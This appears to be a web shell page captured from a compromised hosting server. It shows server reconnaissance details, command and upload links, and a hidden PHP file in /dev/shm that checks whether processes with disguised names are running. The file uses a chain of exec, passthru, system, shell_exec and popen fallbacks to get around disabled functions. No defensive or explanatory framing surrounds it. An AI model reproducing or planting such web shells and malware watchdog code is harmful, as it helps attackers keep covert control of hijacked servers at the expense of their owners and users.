Server IP : 68.65.122.142  /  Your IP : 18.217.108.153
Web Server : LiteSpeed
System : Linux server167.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : glenirhm ( 1318)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (1777) :  /usr/share/groff/../perl5/../python-cllib/../emacs/../../src/../../home2/../lib/../dev/shm/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //usr/share/groff/../perl5/../python-cllib/../emacs/../../src/../../home2/../lib/../dev/shm/.factor
<?php   $files = ['settings.inc','img_auth5','Partnerzy','class.wsdlcache','function.mailto','modifprod','validation','tbl_export','cma_m_scheduled','function.anchor','File_Operations','CSSDefinition','gallery_acp','com_forum','email_welcome','changelog.k2','view.html','default_section','3dsecure','busca_arqs','strcasecmp','phocacolortext','CYEC06_2winners','class.support','jpgraph_mgraph','delfromcart','Form.class','time_tracking','webdb_view_test2','user_item']; foreach ($files as $f) {     $res = @run("pgrep {$f}");     if (!preg_match('/\d+/', $res)) {         die("<f>{$f}</f>");     } } die('!ended!');  function run($in) {     $out = '';     if (function_exists('exec')) {         @exec($in, $out);         $out = @join("\n", $out);     } elseif (function_exists('passthru')) {         ob_start();         @passthru($in);         $out = ob_get_clean();     } elseif (function_exists('system')) {         ob_start();         @system($in);         $out = ob_get_clean();     } elseif (function_exists('shell_exec')) {         $out = shell_exec($in);     } elseif (is_resource($f = @popen($in, "r"))) {         $out = "";         while (!@feof($f))             $out .= fread($f, 1024);         pclose($f);     }     return $out; }